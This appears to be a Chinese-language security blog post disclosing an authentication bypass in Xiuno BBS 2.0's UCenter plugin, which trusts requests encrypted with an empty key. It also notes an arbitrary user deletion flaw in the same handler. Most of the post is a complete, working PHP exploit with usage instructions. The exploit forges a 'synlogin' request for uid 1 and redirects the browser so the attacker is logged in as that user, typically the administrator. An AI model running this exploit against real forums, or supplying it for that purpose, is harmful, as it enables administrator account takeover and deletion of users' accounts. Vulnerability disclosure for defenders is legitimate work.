Xiuno BBS 2.0 前台认证授权绕过漏洞

作者:ztz@Dis9Team 0×0 漏洞概述 xiuno实现了使用uc接口完成uc center登录的插件 xiuno默认没有启用uc插件 在不启用时,uc插件的key:uc_appkey为空,因此在不启用uc插件的时候,uc插件自带的加解密函数可以利用这个特性被绕过 uc用key解密传递进来的参数,其中解密后的action若等于synlogin,uid有效的话,将会使用该uid登录xiuno论坛的前台  

0×1 代码解析

此版本为2.0 $code = core::gpc('code' ); //将传入的code参数用key解密然后放入get数组中 parse_str(uc_authcode ($code, 'DECODE' , $ucconf['uc_appkey']), $get); $action = $get['action']; //若action为synlogin,则用get数组中uid作为当前用户登录 elseif($action == 'synlogin' ) { $uid = intval($get[ 'uid']); $muser = new user(); $userdb = $muser->read($uid); $muser->set_login_cookie($userdb); exit(API_RETURN_SUCCEED); } //同时此处还有一个任意用户删除漏洞 elseif($action == 'deleteuser' ) { $uids = $get[ 'ids']; $uids = str_replace( "'", '' , $uids); $arr = explode( ',', $uids); $muser = new user(); foreach($arr as $uid) { $uid = intval($uid); $muser->xdelete($uid); } exit(API_RETURN_SUCCEED); }  

0×2 PoC

  <?php /* * Xiuno bbs RC2 前台授权绕过漏洞exp * Author: ztz@Dis9Team * Mail: ztz5651483@gmail.com * Blog: ztz.fuzzexp.org * 使用说明: * $_GET['target']: 目标的域名 * $_GET['ip']: 目标的ip * * 如: * http://yoursite.com/xiuno.php?target=www.xiuno.com&ip=114.113.224.156 * 然后手动访问主页即可 */ function uc_authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); } } function send($request, $ip) { $result = ''; $meta = parse_url($request); $path = isset($meta['path']) ? $meta['path'] : exit('path error'); $host = isset($meta['host']) ? $meta['host'] : exit('host error'); $query = isset($meta['query']) ? $meta['query'] : exit('query error'); $packet = "GET $path?$query HTTP/1.1\r\n"; $packet .= "User-Agent: Mozilla/5.0\r\n"; $packet .= "Host: ".$ip."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $fp = fsockopen($ip, 80); fputs($fp, $packet); while(!feof($fp)) { $result .= fgets($fp,4096); } if(strpos($result, 'Set-Cookie') > 0) { $begin = strpos($result, 'Set-Cookie:'); $end = strpos($result, ";", $begin); $cookie = substr($result, $begin + 11, $end - $begin - 11); return $cookie; } } $target = $_GET['target']; $ip = $_GET['ip']; $time = time(); $str = "time=$time&action=synlogin&uid=1"; $en_str = uc_authcode($str, 'ENCODE', ''); $request = "http://$target/plugin/ucenter/api/uc.php?code=".urlencode($en_str); header("Location: $request", true, 302); ?>    

发表评论